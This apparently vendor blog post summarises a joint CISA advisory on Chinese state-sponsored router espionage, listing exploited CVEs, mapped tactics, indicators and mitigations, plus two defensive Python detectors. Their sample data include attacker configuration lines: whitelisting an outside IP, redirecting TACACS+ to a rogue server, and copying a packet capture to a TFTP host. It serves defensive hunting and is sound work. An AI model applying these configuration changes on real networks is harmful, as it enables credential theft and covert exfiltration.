In August 2025, a joint Cybersecurity Advisory (CSA) was issued by CISA, NSA, FBI, and allied cybersecurity agencies across the Five Eyes, EU, and partner nations. This advisory details a long-term espionage campaign by People’s Republic of China (PRC) state-sponsored actors—linked to companies supporting the Ministry of State Security (MSS) and People’s Liberation Army (PLA).
The actors—tracked in industry reporting as Salt Typhoon, OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor—have systematically compromised telecommunications, government, transportation, lodging, and military networks worldwide. Their operations focus on exploiting backbone routers and trusted interconnections, modifying infrastructure for long-term access, and exfiltrating data to power global surveillance and espionage systems.
PREFER TO LISTEN?
Check out our recently released podcast episode, where host Tova Dvorin is joined by SafeBreach expert Adrian Culley to break down CISA Advisory AA25-239. Listen now on Spotify or Apple Podcasts.
Understanding the PRC Espionage Threat
Chinese state-sponsored actors have been conducting global campaigns since at least 2021, leveraging both state-linked front companies and compromised network devices.
Their primary goals are to:
- Maintain persistence across routers and service-provider infrastructure.
- Exfiltrate telecommunications data to track communications and movements.
- Pivot laterally into customer and enterprise networks via trusted connections.
This activity emphasizes network infrastructure exploitation, making telecommunications providers and backbone routers especially critical targets.
Recent PRC-sponsored APTs we have covered include APT40 (Kryptonite Panda) and Volt Typhoon (we just covered an update on Volt Typhoon on our podcast this month; check it out on Spotify and Apple Podcasts).
Key Tactics, Techniques, and Procedures (TTPs)
Initial Access
Actors relied heavily on known CVEs in network edge devices rather than zero-days, including:
- Ivanti Connect Secure (CVE-2024-21887) – command injection (Exploitation for Client Execution [T1203])
- Palo Alto GlobalProtect (CVE-2024-3400) – unauthenticated RCE (Exploitation of Public-Facing Application [T1190])
- Cisco IOS XE (CVE-2023-20198, CVE-2023-20273) – authentication bypass + privilege escalation (Exploitation of Remote Services [T1133])
- Cisco Smart Install (CVE-2018-0171) – RCE (Exploitation of Remote Services [T1133])
They also used:
- VPS infrastructure and compromised intermediate routers to anonymize and redirect activity (Use of Proxy Services [T1090]).
- Trusted provider-to-provider and provider-to-customer links for lateral pivoting (Exploitation of Trust Relationships [T1199]).
Persistence
Once inside, actors modified systems to maintain long-term access:
- ACL modifications to whitelist actor-controlled IPs (Modify System Configuration [T1601]).
- Enabling SSH and HTTP(S) services on high, non-standard ports (Ingress Tool Transfer / Non-Standard Port [T1571]).
- Abuse of Cisco Guest Shell containers to stage tools, execute scripts, and evade monitoring (Container Administration Command [T1609]).
Lateral Movement & Collection
After persistence, attackers shifted focus to expanding control and data collection:
- Packet capture (PCAP) to harvest TACACS+/RADIUS authentication traffic (Network Sniffing [T1040]).
- Modification of TACACS+ server configs to redirect credentials (Modify Authentication Process [T1556]).
- Enumeration of router configs, BGP routes, and subscriber records (Network Device Configuration Dump [T1602]).
Exfiltration
Data was exfiltrated using methods designed to blend into legitimate traffic:
- GRE/IPsec tunnels to conceal C2 and exfiltration (Exfiltration Over Unencrypted/Encrypted Non-C2 Channel [T1048]).
- Deployment of custom SFTP clients (cmd1, cmd3, new2, sft) to move data off compromised routers (Exfiltration Over Alternative Protocol [T1048.003]).
Indicators of Compromise (IOCs)
The advisory provides extensive IOCs tied to Chinese state-sponsored activity. These can be aligned to MITRE ATT&CK techniques for clarity:
- APT-associated IPs active between 2021–2025 (e.g., 167.88.173[.]252, 193.239.86[.]132, 45.61.165[.]157) → Command and Control over IPv4 [T1071.001]
- YARA rules for detecting custom SFTP clients (cmd1, cmd3, new2, sft) → Exfiltration Over Alternative Protocol [T1048.003]
- Snort rule for CVE-2023-20198 exploitation attempts (Cisco IOS XE auth bypass) → Exploitation of Remote Services [T1133]
- ACL modifications whitelisting malicious IPs (observed as IOC patterns) → Modify System Configuration [T1601]
- Suspicious TACACS+/RADIUS redirection traffic → Modify Authentication Process [T1556]
- Unusual GRE/IPsec tunneling patterns tied to exfiltration → Exfiltration Over Unencrypted/Encrypted Non-C2 Channel [T1048]
SafeBreach Coverage and Playbook Updates
Existing Behavioral Coverage
- Credential theft and brute-force over RDP, HTTP/S, SSH, and SNMP (Simulations 192, 258, 173, 1325)
- Remote exploitation of Ivanti Connect Secure (Sim 9482)
- Remote exploitation of Palo Alto PAN-OS command injection (Sim 9992)
- Agentless lateral movement techniques: RDP (6473), SSH scanning (8021), WinRM/Remote Registry (5670–5674)
- Active Directory reconnaissance via tools like schtasks, ntdsutil, PowerShell (7223 and related)
- Covert data exfiltration using TCP, UDP, HTTP GET/POST, SNMP (100, 101, 10481, 110, 121)
- Creation of malicious services and scheduled tasks (2294, 10439, etc)
New Simulation Coverage
- Simulation #11107 – Write cmd1 (18e4f4) trojan to disk
- Simulation #11108 – Pre-execution phase of cmd1 (18e4f4) trojan (Linux)
- Simulation #11109 – Transfer of cmd1 (18e4f4) ransomware over HTTP/S
- Simulation #11110 – Transfer of cmd1 (18e4f4) trojan over HTTP/S
- Simulation #11111 – Email cmd1 (18e4f4) trojan as compressed attachment
- Simulation #11112 – Email cmd1 (18e4f4) trojan as compressed attachment
What You Should Do Now
SafeBreach customers can validate their defenses against this campaign using two methods:
Method 1 – Navigate to the “SafeBreach Scenarios” page and select the scenario.

Method 2 – Run the Known Attack Series report to execute all mapped simulations.

Mitigation Strategies
The CISA advisory outlines a series of defensive measures organizations should take to counter PRC state-sponsored actors:
- Baseline and Audit Router Configurations
  - Regularly pull all running configurations from networking equipment and compare against the latest authorized baselines.
  - Review ACLs, remote access configs, and transport protocols for unauthorized changes.
  - Validate routing tables to ensure no unexpected or malicious routes have been added.
- Enforce Secure Management Protocols
  - Require SNMPv3 with appropriate authentication and privacy configurations.
  - Eliminate weak/default community strings and restrict SNMP writes to trusted devices only.
  - Disable unused services, ports, and legacy protocols such as Telnet and unencrypted HTTP.
- Harden Authentication & Authorization
  - Verify the authenticity and permission levels of all local accounts.
  - Watch for abnormal TACACS+/RADIUS server changes or redirection attempts.
- Audit Containerized Services
  - If using Cisco Guest Shell (IOS XE or NX-OS), monitor with a combination of syslog, AAA accounting, container logs, and off-box telemetry.
  - Hunt for suspicious Guest Shell commands such as guestshell enable, guestshell run bash, chvrf, or dohost.
  - Disable Guest Shell entirely if not operationally required.
- Validate Firmware and Images
  - Compare firmware and image hashes against vendor-provided values to detect tampering.
  - Enable signed image enforcement and configuration integrity features where supported.
SafeBreach Recommendation (in addition to CISA guidance):
- Prioritize patching for critical vulnerabilities often exploited by PRC actors, including:
  - CVE-2024-21887 (Ivanti Connect Secure)
  - CVE-2024-3400 (Palo Alto GlobalProtect)
  - CVE-2023-20198 / CVE-2023-20273 (Cisco IOS XE)
  - CVE-2018-0171 (Cisco Smart Install)
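The first two mitigations (baseline/audit of router configurations and secure management protocols), together with the Guest Shell and AAA items, can be turned into a routine configuration audit. The following is an added example that is not part of the CISA advisory or of SafeBreach's tooling: it diffs a constructed Cisco-IOS-style running configuration against a constructed authorized baseline and classifies every line of drift. The hostnames, addresses, rule regexes and severities are assumptions made for this example; the port patterns are the ones the advisory lists for relocated services.

```python
"""Compare a router's running configuration against its authorized baseline
and flag the kinds of change associated with long-term actor persistence.

Added example, not from the CISA advisory or from SafeBreach. The configs,
hostnames and addresses are constructed; the rules and severities are this
example's own choices.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed authorized baseline: SSH-only management, SNMPv3, one AAA server.
BASELINE = """\
hostname edge-rtr-1
ip access-list extended MGMT-IN
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
 deny ip any any
snmp-server group OPS v3 priv
tacacs server AAA1
 address ipv4 10.10.5.20
line vty 0 4
 transport input ssh
"""

# Constructed running config showing an ACL whitelist entry, an SNMPv2c community,
# a second TACACS+ server, a GRE tunnel, relocated SSH/HTTPS ports, Guest Shell
# enabled and Telnet re-added on the VTY lines.
RUNNING = """\
hostname edge-rtr-1
ip access-list extended MGMT-IN
 permit tcp 10.10.0.0 0.0.255.255 any eq 22
 permit ip host 203.0.113.77 any
 deny ip any any
snmp-server group OPS v3 priv
snmp-server community public RW
tacacs server AAA1
 address ipv4 10.10.5.20
tacacs server AAA2
 address ipv4 198.51.100.9
interface Tunnel0
 tunnel mode gre ip
 tunnel destination 198.51.100.9
ip ssh port 22122 rotary 1
ip http secure-server
ip http secure-port 18443
iox
app-hosting appid guestshell
line vty 0 4
 transport input ssh telnet
"""


@dataclass
class Finding:
    severity: str
    line: str
    reason: str


# (regex, severity, reason). Lines added since the baseline are matched in order;
# the first matching rule wins. Regexes are this example's assumptions.
RULES = [
    (r"^\s*permit\s", "high", "ACL permit entry not in baseline (possible whitelisting of actor IPs)"),
    (r"^\s*interface Tunnel", "high", "tunnel interface not in baseline"),
    (r"^\s*tunnel (mode|destination|source)\b", "high", "tunnel parameters not in baseline (GRE/IPsec channel)"),
    (r"^\s*ip ssh port\s+(\d+)", "high", "SSH moved to a non-standard port"),
    (r"^\s*ip http (secure-)?port\s+(\d+)", "high", "HTTP(S) moved to a non-standard port"),
    (r"^\s*ip http (secure-)?server\b", "medium", "HTTP(S) management server enabled"),
    (r"^\s*(iox|app-hosting appid guestshell)\b", "high", "IOx / Guest Shell enabled"),
    (r"^\s*(tacacs|radius) server\b", "high", "new TACACS+/RADIUS server block"),
    (r"^\s*address ipv4\s+(\S+)", "high", "AAA server address not in baseline (credential redirection risk)"),
    (r"^\s*snmp-server community\b", "high", "SNMPv1/v2c community string configured (SNMPv3 required)"),
    (r"^\s*transport input\b.*\btelnet\b", "medium", "Telnet enabled on VTY lines"),
    (r"^\s*ip route\b", "high", "static route not in baseline"),
    (r"^\s*(no logging|no aaa accounting)\b", "high", "logging or accounting disabled"),
]


def suspicious_mgmt_port(port: int) -> bool:
    """True for port numbers matching the relocated-service patterns the advisory
    lists (22x22 / xxx22 for SSH, 18xxx for HTTPS, 57722 for IOS XR sshd_operns)."""
    return bool(re.fullmatch(r"22\d22|\d{3}22|18\d{3}", str(port))) or port == 57722


def config_lines(text: str) -> Counter:
    """Multiset of non-empty lines, so duplicated blocks (e.g. two 'address ipv4'
    lines under different servers) are counted rather than collapsed."""
    return Counter(line.rstrip() for line in text.splitlines() if line.strip())


def audit(baseline: str, running: str) -> list[Finding]:
    base, run = config_lines(baseline), config_lines(running)
    findings: list[Finding] = []
    for line in (run - base).elements():  # present now, absent from the baseline
        for pattern, severity, reason in RULES:
            m = re.search(pattern, line)
            if not m:
                continue
            groups = m.groups()
            last = groups[-1] if groups else None
            if last and last.isdigit() and suspicious_mgmt_port(int(last)):
                reason += " (matches advisory high-port pattern)"
            findings.append(Finding(severity, line.strip(), reason))
            break
        else:
            findings.append(Finding("low", line.strip(), "unreviewed drift from baseline"))
    for line in (base - run).elements():  # in the baseline, gone from the running config
        findings.append(Finding("medium", line.strip(), "baseline line removed"))
    return findings


def report(findings: list[Finding]) -> None:
    order = {"high": 0, "medium": 1, "low": 2}
    for f in sorted(findings, key=lambda f: order[f.severity]):
        print(f"[{f.severity:6}] {f.line:45} {f.reason}")


if __name__ == "__main__":
    report(audit(BASELINE, RUNNING))
```

The multiset diff deliberately ignores line order, so a reordered but otherwise identical config produces no findings, while a removed baseline line (here the original `transport input ssh`) is reported alongside the additions; in practice the running config would be pulled from the device and the baseline from version control.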
Proactive Threat Monitoring
Organizations should actively hunt for signs of malicious activity across their environments:
- Monitor for Configuration Manipulation
  - Alert on unauthorized ACL modifications, new tunnels, or routing changes.
  - Verify any PCAP commands on network equipment are legitimate and expected.
- Watch for Service Abuse
  - Look for management services enabled on non-standard ports (e.g., SSH on 22x22/xxx22 patterns, HTTPS on 18xxx, IOS XR sshd_operns on TCP/57722).
  - Monitor for FTP/TFTP traffic to unauthorized destinations, especially if preceded by PCAP capture commands.
- Detect Suspicious Authentication Behavior
  - Flag TACACS+ traffic to non-approved IPs or flows leaving the management VRF.
  - Correlate TACACS+/AAA changes with potential credential harvesting attempts.
- Hunt for Guest Shell Abuse
  - Track lifecycle events: guestshell enable, guestshell run, guestshell disable/destroy.
  - Audit container file systems and command histories where possible.
- Monitor Logs and Integrity
  - Watch for attempts to clear, disable, or redirect logging.
  - Validate that logs are flowing to centralized collectors via encrypted channels.
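The hunting items above can be run as one detection pass over command-accounting records from the routers. The following is an added example, not from the advisory or from SafeBreach: it processes constructed AAA command-accounting lines in a made-up `ts host user= src= cmd=""` format and applies the checks listed above, including the sequence check for a file transfer that follows a packet capture and the approved-AAA-server comparison. The hostnames, users, addresses, the single approved TACACS+ server and the one-hour export window are assumptions for this example.

```python
"""Hunt for router-abuse patterns in AAA command-accounting records.

Added example, not from the CISA advisory or from SafeBreach. The log lines are
constructed in a made-up 'ts host user= src= cmd=""' format that stands in for
TACACS+ command accounting; hosts, users, addresses, the approved AAA server and
the export window are all assumptions for this example.
"""
import re
from collections import Counter
from datetime import datetime, timedelta

APPROVED_AAA_SERVERS = {"10.10.5.20"}  # assumption: the only sanctioned TACACS+ server

# Constructed records: one operator session that whitelists an IP, relocates SSH,
# adds an unapproved TACACS+ server, enables Guest Shell, captures traffic, exports
# the capture over TFTP and then removes a syslog destination; later, a legitimate
# session by another user that touches only approved values.
SAMPLE_LOG = """\
2025-01-12T02:11:04Z edge-rtr-1 user=netops src=203.0.113.77 cmd="ip access-list extended MGMT-IN"
2025-01-12T02:11:09Z edge-rtr-1 user=netops src=203.0.113.77 cmd="permit ip host 203.0.113.77 any"
2025-01-12T02:12:30Z edge-rtr-1 user=netops src=203.0.113.77 cmd="ip ssh port 22122 rotary 1"
2025-01-12T02:14:02Z edge-rtr-1 user=netops src=203.0.113.77 cmd="tacacs server AAA2"
2025-01-12T02:14:05Z edge-rtr-1 user=netops src=203.0.113.77 cmd="address ipv4 198.51.100.9"
2025-01-12T02:20:11Z edge-rtr-1 user=netops src=203.0.113.77 cmd="guestshell enable"
2025-01-12T02:25:40Z edge-rtr-1 user=netops src=203.0.113.77 cmd="monitor capture CAP1 interface GigabitEthernet0/0/1 both"
2025-01-12T02:25:44Z edge-rtr-1 user=netops src=203.0.113.77 cmd="monitor capture CAP1 start"
2025-01-12T02:41:19Z edge-rtr-1 user=netops src=203.0.113.77 cmd="copy bootflash:CAP1.pcap tftp://198.51.100.9/CAP1.pcap"
2025-01-12T02:43:00Z edge-rtr-1 user=netops src=203.0.113.77 cmd="no logging host 10.10.9.9"
2025-01-12T09:00:00Z edge-rtr-1 user=alice src=10.10.1.15 cmd="tacacs server AAA1"
2025-01-12T09:00:05Z edge-rtr-1 user=alice src=10.10.1.15 cmd="address ipv4 10.10.5.20"
2025-01-12T09:01:00Z edge-rtr-1 user=alice src=10.10.1.15 cmd="ip ssh port 2222 rotary 1"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) cmd="(?P<cmd>[^"]*)"$')
PORT_RE = re.compile(r"^ip (?:ssh port|http secure-port|http port) (\d+)\b")
ODD_PORT_RE = re.compile(r"22\d22|\d{3}22|18\d{3}")  # advisory port patterns; 57722 falls under \d{3}22
ADDR_RE = re.compile(r"^address ipv4 (\S+)")
COPY_RE = re.compile(r"^copy \S+ (?:tftp|ftp)://([^/]+)/")
# Single-line rules: (category, severity, regex); the first match wins.
RULES = [
    ("config-manipulation", "high", re.compile(r"^(?:ip access-list|permit |deny |interface Tunnel|tunnel |ip route |router bgp)")),
    ("pcap", "medium", re.compile(r"^monitor capture\b")),
    ("guestshell", "high", re.compile(r"^(?:guestshell (?:enable|run|disable|destroy)|chvrf|dohost)\b")),
    ("logging-tamper", "high", re.compile(r"^(?:no logging|clear logging|no aaa accounting)\b")),
    ("aaa-change", "low", re.compile(r"^(?:tacacs|radius) server\b")),
]


def parse(line: str):
    """Parse one accounting record; returns None for lines in another format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def make_alert(ev: dict, category: str, severity: str, why: str) -> dict:
    return {"ts": ev["ts"], "user": ev["user"], "src": ev["src"],
            "category": category, "severity": severity, "cmd": ev["cmd"], "why": why}


def hunt(log_text: str, approved_aaa=APPROVED_AAA_SERVERS, export_window=timedelta(hours=1)) -> list[dict]:
    alerts: list[dict] = []
    last_capture = None  # time of the most recent packet-capture command on this device
    for raw in log_text.splitlines():
        ev = parse(raw)
        if ev is None:
            continue
        cmd = ev["cmd"]
        if m := PORT_RE.match(cmd):
            port = m.group(1)
            if ODD_PORT_RE.fullmatch(port):
                alerts.append(make_alert(ev, "service-abuse", "high", f"management service on port {port} matches advisory pattern"))
            else:
                alerts.append(make_alert(ev, "service-abuse", "medium", f"management service moved to port {port}"))
        elif m := ADDR_RE.match(cmd):
            if m.group(1) not in approved_aaa:
                alerts.append(make_alert(ev, "aaa-redirect", "high", f"AAA server {m.group(1)} is not approved"))
        elif m := COPY_RE.match(cmd):
            if last_capture is not None and ev["ts"] - last_capture <= export_window:
                alerts.append(make_alert(ev, "pcap-export", "high", f"transfer to {m.group(1)} shortly after a packet capture"))
            else:
                alerts.append(make_alert(ev, "file-transfer", "medium", f"transfer to {m.group(1)}"))
        else:
            for category, severity, rx in RULES:
                if rx.search(cmd):
                    alerts.append(make_alert(ev, category, severity, category))
                    if category == "pcap":
                        last_capture = ev["ts"]
                    break
    return alerts


def summarize(alerts: list[dict]) -> Counter:
    return Counter(a["category"] for a in alerts)


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]:%Y-%m-%d %H:%M:%S} {a["severity"]:6} {a["category"]:20} {a["user"]:7} {a["cmd"]}')
    print(dict(summarize(found)))
```

Two design points carry over to a real deployment: the `pcap` then `copy ... tftp://` sequence is what separates an exfiltrated capture from routine file handling, so the capture timestamp must be kept per device rather than globally; and the AAA check is an allow-list, so an `address ipv4` pointing at the sanctioned server (alice's change here) produces nothing while the unapproved one is high severity.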
Stay Ahead with SafeBreach
SafeBreach enables organizations to simulate the full range of Chinese state-sponsored tactics outlined in CISA Advisory AA25-239. By validating both behavioral coverage and IOC-triggered simulations, defenders can assess detection, close gaps, and prioritize remediation.
With SafeBreach Propagate, customers can further evaluate how attackers could pivot through their environments—mapping attack paths, visualizing lateral movement, and addressing exposures to critical assets.
Run the latest SafeBreach simulations today to ensure your defenses stand ready against PRC espionage campaigns.